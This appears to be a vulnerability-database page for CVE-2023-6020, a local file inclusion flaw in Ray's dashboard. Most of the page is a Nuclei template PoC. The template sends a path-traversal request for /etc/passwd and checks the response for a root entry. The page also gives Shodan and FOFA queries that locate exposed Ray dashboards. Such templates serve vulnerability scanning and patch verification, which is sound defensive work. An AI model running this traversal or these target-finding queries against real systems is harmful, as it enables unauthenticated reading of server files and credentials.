CVE-2023-6020: Ray Static File - Local File Inclusion

2025-08-01 Ray Static File PoC Public

Description

LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.

PoC

id: CVE-2023-6020

info:
  name: Ray Static File - Local File Inclusion
  author: byt3bl33d3r
  severity: high
  description: |
    LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.
  impact: |
    Unauthenticated attackers can read any file on the server via path traversal in the /static/ directory, potentially exposing sensitive configuration files and credentials.
  remediation: |
    Update Ray to a patched version that restricts static file access.
  reference:
    - https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6020
    cwe-id: CWE-862
    epss-score: 0.14652
    epss-percentile: 0.96479
    cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ray_project
    product: ray
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    fofa-query:
      - body="ray dashboard"
      - icon_hash=463802404
  tags: cve2023,cve,lfi,ray,oos,ray_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "aiohttp"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008f8a7653b457cc44bceaad8d4b8925f2ea2221aecca6ebecba216c8e58dba2c1022100eb1632c6f4e239bfc1694fa6d918b2bba97eaa2ba6b8619618aa6650a9cea44a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities